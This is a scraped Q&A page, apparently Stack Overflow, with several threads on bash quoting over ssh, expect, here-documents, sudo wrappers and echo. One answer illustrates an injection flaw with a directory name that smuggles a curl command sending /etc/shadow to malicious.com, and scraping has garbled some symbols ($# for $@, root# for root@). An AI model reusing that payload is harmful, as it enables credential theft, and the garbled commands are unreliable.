What does $"${#// /\\ }" mean in bash? - bash

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?

This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, is passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
The expansion thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${@// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${@// /\\ }" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
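For what it's worth, $"..." is ordinarily inert; with no message catalog installed for the script, the lookup just falls through to the literal text:
echo $"hello world"   # no translation catalog: prints hello world
echo "hello world"    # identical output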
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
    ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\n')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$@"
# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which is what printf %q
# quotes content for.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
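To see what printf %q actually generates, here's a small sketch with invented argument values:
set -- "hello world" 'it'\''s here' $'tab\there'
printf -v cmd_str '%q ' printf '%s\n' "$@"
echo "$cmd_str"
# printf %s\\n hello\ world it\'s\ here $'tab\there'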
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
    python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$@"
}
cmd_str=$(posix_quote "$@")
ssh "$slave" "$cmd_str"

Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${@// /\\ } will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.
Anyway, an example is probably in order. Create a tst.sh containing the line above and make it executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"' >> tst.sh
chmod +x tst.sh
Try running a mkdir command on the remote server (the slave) for a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid@server ls /tmp
And if you're in a different country and really want some non-English characters, those are preserved by the surrounding $"...", which is the locale-specific (translatable) quoting form.

How do I call Awk Print Variable within Expect Script that uses Spawn?

I've been creating some basic system health checks, and one of the checks includes a yum repo health status that uses one of Chef's tools called 'knife'. However, when I try to awk a column, I get
can't read "4": no such variable.
Here is what I am currently using:
read -s -p "enter password: " pass
/usr/bin/expect << EOF
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v| grep Repo-name| awk '{print $4}'\" "
expect {
    -nocase password: { send "$pass\r" }; expect eof
}
EOF
I've tried other variations as well, such as replacing the awk single quotes with double curly braces, escaping the variable, and even setting the variable to the command, and keep getting the same negative results:
awk {{print $4}}
awk '{print \$4}'
awk '\{print \$4\}'
awk {\{print \$4\}}
Does anyone know how I can pass this awk column selector variable within a spawned knife ssh command that sends the variable to the ssh host?
This line:
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print $4}'\""
has many layers of quoting (Tcl/Expect, ssh, bash, awk), and it's quoting of different types. Such things are usually pretty nasty and can require using rather a lot of backslashes to persuade values to go through the outer layers unmolested. In particular, Tcl and the shell both want to get their hands on variables whose uses start with $ and continue with alphanumerics. (Backslashes that go in deep need to be themselves quoted with more backslashes, making the code hard to read and hard to understand precisely.)
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print \\\$4}'\""
However, there's one big advantage available to us: we can put much of the code into braces at the outer level as we are not actually substituting anything from Tcl in there.
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v|grep Repo-name|awk '{print \$4}'"}
The thing inside the braces is conventional shell code, not Tcl. And in fact we can probably simplify further, as neither grep nor awk needs to be elevated:
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v"|grep Repo-name|awk '{print $4}'}
Depending on the sudo configuration, you might even be able to do this (which I'd actually rather people did on systems I controlled anyway, rather than handing out general access to root shells):
spawn knife ssh -m host1 {sudo yum repolist -v|grep Repo-name|awk '{print $4}'}
And if my awk is good enough, you can get rid of the grep like this:
spawn knife ssh -m host1 {sudo yum repolist -v|awk '/Repo-name/{print $4}'}
This is starting to look more manageable. However, if you want to substitute a Tcl variable for Repo-name, you need a little more work that reintroduces a backslash, but it is all much tamer than before, as there are fewer layers of complexity to create headaches.
set repo "Repo-name"
spawn knife ssh -m host1 "sudo yum repolist -v|awk '/$repo/{print \$4}'"
In practice, I'd be more likely to get rid of the awk entirely and do that part in Tcl code, as well as setting up key-based direct access to the root account, allowing avoiding the sudo, but that's getting rather beyond the scope of your original question.
Donal Fellows' helpful answer contains great analysis and advice.
To complement it with an explanation of why replacing $4 with \\\$4 worked:
The goal is ultimately for awk to see $4 as-is, so we must escape for all intermediate layers in which $ has special meaning.
I'll use a simplified command in the examples below.
Let's start by temporarily eliminating the shell layer, by quoting the opening here-doc delimiter as 'EOF', which makes the content behave like a single-quoted string; i.e., the shell treats the content as a literal, without applying expansions:
expect <<'EOF' # EOF is quoted -> literal here-doc
spawn bash -c "awk '{ print \$1 }' <<<'hi there'"
expect eof
EOF
Output:
spawn bash -c awk '{ print $1 }' <<<'hi there'
hi
Note that $1 had to be escaped as \$1 to prevent expect from interpreting it as an expect variable reference.
Given that the here-doc in your question uses an unquoted opening here-doc delimiter (EOF), the shell treats the content as if it were a double-quoted string; i.e., shell expansions are applied.
Given that the shell now expands the script first, we must add an extra layer of escaping for the shell, by prepending two extra \ to \$1:
expect <<EOF # EOF is unquoted -> shell expansions happen
spawn bash -c "awk '{ print \\\$1 }' <<<'hi there'"
expect eof
EOF
This yields the same output as above.
Based on the rules of parsing an unquoted here-doc (which, as stated, is parsed like a double-quoted string), the shell turns \\ into a single \, and \$1 into literal $1, combining to literal \$1, which is what the expect script needs to see.
(Verify with echo "\\\$1" in the shell.)
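The same check, spelled out (run at a bash prompt):
echo "\\\$1"   # prints \$1 -- \\ collapses to \ and \$ to $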
Simplifying the approach with command-line arguments and a quoted here-doc:
As you can see, the multiple layers of quoting (escaping) can get confusing.
One way to avoid problems is to:
use a quoted here-doc, so that the shell doesn't interpret it in any way, so you can then focus on expect's quoting needs
pass any shell variable values via command-line arguments, and reference them from inside the expect script as expressions (either directly or by assigning them to an expect variable first).
expect -f - 'hi there' <<'EOF'
set txt [lindex $argv 0]
spawn bash -c "awk '{ print \$1 }' <<<'$txt'"
expect eof
EOF
Text hi there is passed as the 1st (and only) command-line argument, which can be referenced as [lindex $argv 0] in the script.
(-f - explicitly tells expect to read its script from stdin, which is necessary here to distinguish the script from the arguments.)
set txt ... creates expect variable $txt, which can then be used unquoted or as part of double-quoted strings.
To create literal strings in expect, use {...} (the equivalent of the shell's '...').

read file in here document bash script

When I execute this, I get just empty lines as output
# /bin/bash <<- EOF
while read a
do
echo $a
done < /etc/fstab
EOF
If I copy the content of here-document into file and execute it, everything works as expected (I get content of /etc/fstab file).
Could anyone explain why?
UPDATE:
Answering a question about why would I need to pass here-doc to bash this way, here is what I'm actually trying to do:
ssh user@host /bin/bash <<- EOF
while read f; do
sed -i -e "s/$OLD_VAL/$NEW_VAL/g" $f
done < /tmp/list_of_files
EOF
Sed is complaining that $f is not set
In case someone bumps into this, here is a version that works:
# /bin/bash <<- EOF
while read a
do
echo \$a
done < /etc/fstab
EOF
The variable a is not defined in the parent bash script, so it is substituted with an empty value before the here-document is passed to the child bash. To avoid the substitution, the $-sign should be escaped with "\".
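A minimal side-by-side sketch of the two behaviors (quoting the delimiter, as in <<'EOF', is the other way to stop the parent shell's expansion wholesale):
bash <<EOF
a=set-in-child; echo $a
EOF
# the parent shell substitutes $a (unset) before the child runs: prints an empty line
bash <<'EOF'
a=set-in-child; echo $a
EOF
# quoted delimiter: the child bash sees $a intact and prints set-in-child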
You don't need a here-document here. If you were writing a script you could do:
#!/bin/bash
while read a
do
echo "$a"
done < /etc/fstab
I do not have enough reputation here to add comments, so I am forced to answer instead.
First, you have multiple levels of shell going on. In your initial example, the syntax for your HERE doc was incorrect, but your edited update was correct. The <<- will strip leading tab characters (but not spaces) from each line of text and from the line holding your EOF delimiter (which could have been named anything). Using << without the '-' requires the closing delimiter to start in column 0, and any indentation in the body is kept as part of the text.
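A small sketch of the difference (the indentation below is a literal tab):
cat <<- EOF
	this line is tab-indented: <<- strips the tab
EOF
# prints: this line is tab-indented: <<- strips the tab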
Next, you are using ssh, getting your shell from a remote host. This implies that your /tmp/list_of_files must exist on the remote machine, and it means any local shell meta-character should be escaped to ensure it is passed through to the program/location where you actually want it expanded.
I do not believe a HEREdoc is necessary, when you can pass a complete semicolon separated one-liner to ssh. This may also afford you some flexibility to let your local shell do some expansion before variables are passed to ssh or your remote shell.
OLD=' '
NEW=$'\t'
ssh -q user@host "for filename in \$(</tmp/list_of_files); do gsed -i.\$(date +%s) -e 's/'$OLD'/'$NEW'/g' \$filename; done"
Let's not forget the -i is an in-place edit, not a flag to ignore the upper/lower case of our regex match. I like to create backups of my files any time I edit/change them so I have a history if/when anything breaks later.

Double quotes inside quotes in bash

I need to pass $var_path to a bash command inside single quotes and then get the command executed on a remote host. I know that single quotes do not allow passing variables, so I tried double quoting, but I'm getting an error from sed. I assume this happens because its template uses " as well.
var="Test text"
var_path="/etc/file.txt"
echo "$var"|ssh root#$host 'cat - > /tmp/test.tmp && sed -n "/]/{:a;n;/}/b;p;ba}" $var_path > /tmp/new.conf.tmp'
so with ""
var="Test text"
var_path="/etc/file.txt"
echo "$var"|ssh root#$host "cat - > /tmp/test.tmp && sed -n "/]/{:a;n;/}/b;p;ba}" $var_path > /tmp/new.conf.tmp"
Errors from sed
sed: -e expression #1, char 0: unmatched `{'
./script.sh: line 4: n: command not found
./script.sh: line 4: /}/b: No such file or directory
./script.sh: line 4: p: command not found
If $var_path used directly without substitution script works as expected.
Arguments parsed as part of the command to send to the remote system are concatenated with spaces and then passed to the remote shell (in a manner similar to "${SHELL:-sh}" -c "$*"). Fortunately, bash has the built-in printf %q operation (an extension, so not available in plain POSIX shells) to make strings eval-safe, and thus ssh-safe, if your remote SHELL is bash; see the end of this answer for a workaround using Python's shlex module to generate a command safe for non-bash shells.
So, if you have a command that works locally, the first step is to put it into an array (notice also the quotes around the expansion of "$var_path" -- these are necessary to have an unambiguous grouping):
cmd=( sed -n '/]/{:a;n;/}/b;p;ba}' "$var_path" )
...which you can run locally to test:
"${cmd[#]}"
...or transform into an eval-safe string:
printf -v cmd_str '%q ' "${cmd[@]}"
...and then run it remotely with ssh...
ssh remote_host "$cmd_str"
...or test it locally with eval:
eval "$cmd_str"
Now, your specific use case has some exceptions -- things that would need to be quoted or escaped to use them as literal commands, but which can't be quoted if you want them to retain their special meaning. &&, | and > are examples. Fortunately, you can work around this by building those parts of the string yourself:
ssh remote_host "cat - >/tmp/test.tmp && $cmd_str >/tmp/new.conf.tmp"
...which is equivalent to the local array expansion...
cat - >/tmp/test.tmp && "${cmd[@]}" >/tmp/new.conf.tmp
...or the local eval...
eval "cat - >/tmp/test.tmp && $cmd_str >/tmp/new.conf.tmp"
Addendum: Supporting Non-Bash Remote Shells
One caveat: printf %q is guaranteed to quote things in such a way that bash (or ksh, if you're using printf %q in ksh locally) will evaluate them to exactly match the input. If you had a target system with a shell which didn't support extensions to POSIX such as $'', this guarantee would no longer be available, and more interesting techniques become necessary to guarantee robustness in the face of the full range of possible inputs.
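For example, here's the kind of %q output a plain POSIX sh would stumble over (a quick local check):
printf '%q\n' "$(printf 'tab\there')"
# prints: $'tab\there' -- valid in bash and ksh, but a plain sh reads it as a
# literal $ followed by a quoted string, silently changing the meaning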
Fortunately, the Python standard library includes a function to escape arbitrary strings for any POSIX-compliant shell:
quote_string() {
    python -c '
import sys
try:
    from pipes import quote   # Python 2
except ImportError:
    from shlex import quote   # Python 3
print(" ".join([quote(x) for x in sys.argv[1:]]))
' "$@"
}
Thereafter, when you need an equivalent to printf '%q ' "$@" that works even when the remote shell is not bash, you can run:
cmd_str=$(quote_string "${cmd[@]}")
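As a quick illustration with the array from earlier (invented path):
cmd=( sed -n '/]/{:a;n;/}/b;p;ba}' "/etc/file.txt" )
quote_string "${cmd[@]}"
# prints: sed -n '/]/{:a;n;/}/b;p;ba}' /etc/file.txt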
Once you use double quotes, the embedded command can simply use single quotes. This works because inside double quotes, single quotes are treated as regular characters... nothing special.
var="Test text"
var_path="/etc/file.txt";
echo "$var"|ssh root#$host "cat - > /tmp/test.tmp && sed -n '/]/{:a;n;/}/b;p;ba}' $var_path > /tmp/new.conf.tmp"
If you wanted to assign and use variables within the double quotes that would be more tricky.
root@anywhere is dangerous... is there no other way? If you are using certificates, I hope they restrict root to specific commands.

bash parameter variables in script problem

I have a script I wrote for switching to root or running a command as root without a password. I edited my /etc/sudoers file so that my user [matt] has permission to run /bin/su with no password. This is my script "s" contents:
matt: ~ $ cat ~/bin/s
#!/bin/bash
[ "$1" != "" ] && c='-c'
sudo su $c "$*"
If there are no parameters [simply s], it basically calls sudo su, which switches to root with no password. But if I pass parameters, the $c variable equals "-c", which makes su execute a single command.
It works well, except for when I need to use spaces. For example:
matt: ~ $ touch file\ with\ spaces
matt: ~ $ s chown matt file\ with\ spaces
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file with spaces'
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file\ with\ spaces'
matt: ~ $
How can I fix this?
Also, what's the difference between $* and $@ ?
Ah, fun with quoting. Usually, the approach @John suggests will work for this: use "$@", and it won't try to interpret (and get confused by) the spaces and other funny characters in your parameters. In this case, however, that won't work because su's -c option expects the entire command to be passed as a single parameter, and then it'll start a new shell which parses the command (including getting confused by spaces and such). In order to avoid this, you actually need to re-quote the parameters within the string you're going to pass to su -c. bash's printf builtin can do this:
#!/bin/bash
if [ $# -gt 0 ]; then
    sudo su -c "$(printf "%q " "$@")"
else
    sudo su
fi
Let me go over what's happening here:
You run a command like s chown matt file\ with\ spaces
bash parses this into a list of words: "s" "chown" "matt" "file with spaces". Note that at this point the escapes you typed have been removed (although they had their intended effect: making bash treat those spaces as part of a parameter, rather than separators between parameters).
When bash parses the printf "%q " "$@" command in the script, it replaces "$@" with the arguments to the script, with parameter breaks intact. It's equivalent to printf "%q " "chown" "matt" "file with spaces".
printf interprets the format string "%q " to mean "print each remaining parameter in quoted form, with a space after it". It prints: "chown matt file\ with\ spaces ", essentially reconstructing the original command line (it has an extra space on the end, but this turns out not to be a problem).
This is then passed to sudo as a parameter (since there are double-quotes around the $() construct, it'll be treated as a single parameter to sudo). This is equivalent to running sudo su -c "chown matt file\ with\ spaces ".
sudo runs su, and passes along the rest of the parameter list it got including the fully escaped command.
su runs a shell, and it also passes along the rest of its parameter list.
The shell executes the command it got as an argument to -c: chown matt file\ with\ spaces. In the normal course of parsing it, it'll interpret the unescaped spaces as separators between parameters, and the escaped spaces as part of a parameter, and it'll ignore the extra space at the end.
The shell runs chown, with the parameters "matt" and "file with spaces". This does what you expected.
Isn't bash parsing a hoot?
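You can reproduce the key quoting step at an interactive prompt (file name invented):
printf "%q " chown matt "file with spaces"; echo
# prints: chown matt file\ with\ spaces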
"$*" collects all the positional parameters ($1, $2, …) into a single word, separated by one space (more generally, the first character of $IFS). Note that in shell terminology, a word can include any character including spaces: "foo bar" or foo\ bar parses to a single word. For example, if there are three arguments, then "$*" is equivalent to "$1 $2 $3". If there is no argument, then "$*" is equivalent to "" (an empty word).
"$#" is a special syntax that expands to the list of positional parameters, each in its own word. For example, if there are three arguments, then "$#" is equivalent to "$1" "$2" "$3". If there is no argument, then "$#" is equivalent to nothing (an empty list, not a list with one word that is empty).
"$#" is almost always what you want to use, as opposed to "$*", or unquoted $* or $# (the last two are exactly equivalent and perform filename generation (a.k.a. globbing) and word splitting on all the positional parameters).
There's an additional problem, which is that su expects a single shell command as the argument of -c, and you're passing it multiple words. You've had a detailed explanation of getting the quoting right, but let me add advice on how to do it right in a way that sidesteps the double quoting issues. You may also want to refer to https://unix.stackexchange.com/questions/3063/how-do-i-run-a-command-as-the-system-administrator-root for more background on sudo and su.
sudo already runs a command as root, so there's no need to invoke su. In case your script has no arguments, you can just run a shell directly; unless your version of sudo is very old, there's an option for that: sudo -s. So your script can be:
#!/bin/sh
if [ $# -eq 0 ]; then set -- -s; else set -- -- "$@"; fi
exec sudo "$@"
(The else part is to handle the rare case of a command that begins with -.)
I wouldn't bother with such a short script though. Running a command as root is unusual and risky enough that typing the three extra characters shouldn't be a problem. Running a shell as root is even more unusual and risky and surely deserves six more characters.

echo outputs -e parameter in bash scripts. How can I prevent this?

I've read the man pages on echo, and it tells me that the -e parameter will allow an escaped character, such as an escaped n for newline, to have its special meaning. When I type the command
$ echo -e 'foo\nbar'
into an interactive bash shell, I get the expected output:
foo
bar
But when I use this same command in a script (I've tried this command character for character as a test case), I get the following output:
-e foo
bar
It's as if echo is interpreting the escape (because the newline still shows up) yet also treats the -e as a string to echo. What's going on here? How can I prevent the -e from showing up?
You need to use #!/bin/bash as the first line in your script. If you don't, or if you use #!/bin/sh, the script will be run by the Bourne shell and its echo doesn't recognize the -e option. In general, it is recommended that all new scripts use printf instead of echo if portability is important.
In Ubuntu, sh is provided by a symlink to /bin/dash.
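You can reproduce the difference directly on such a system (assuming /bin/sh is dash):
sh -c "echo -e 'foo\nbar'"     # dash's echo: prints "-e foo" then "bar"
bash -c "echo -e 'foo\nbar'"   # bash's echo: prints "foo" then "bar"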
Different implementations of echo behave in annoyingly different ways. Some don't take options (i.e. will simply echo -e as you describe) and automatically interpret escape sequences in their parameters. Some take flags, and don't interpret escapes unless given the -e flag. Some take flags, and interpret different escape sequences depending on whether the -e flag was passed. Some will cause you to tear your hair out if you try to get them to behave in a predictable manner... oh, wait, that's all of them.
What you're probably seeing here is a difference between the version of echo built into bash vs /bin/echo or maybe vs. some other shell's builtin. This bit me when Mac OS X v10.5 shipped with a bash builtin echo that echoed flags, unlike what all my scripts expected...
In any case, there's a solution: use printf instead. It always interprets escape sequences in its first argument (the format string). The problems are that it doesn't automatically add a newline (so you have to remember do that explicitly), and it also interprets % sequences in its first argument (it is, after all, a format string). Generally, you want to put all the formatting stuff in the format string, then put variable strings in the rest of the arguments so you can control how they're interpreted by which % format you use to interpolate them into the output. Some examples:
printf "foo\nbar\n" # this does what you're trying to do in the example
printf "%s\n" "$var" # behaves like 'echo "$var"', except escapes will never be interpreted
printf "%b\n" "$var" # behaves like 'echo "$var"', except escapes will always be interpreted
printf "%b\n" "foo\nbar" # also does your example
Use
alias echo='/usr/bin/echo'
to force 'echo' to invoke coreutils' echo, which interprets the '-e' parameter.
Try this:
import subprocess

def bash_command(cmd):
    subprocess.Popen(['/bin/bash', '-c', cmd])

code = "abcde"
# you can use echo options such as -e
bash_command('echo -e "' + code + '"')
Source: http://www.saltycrane.com/blog/2011/04/how-use-bash-shell-python-subprocess-instead-binsh/
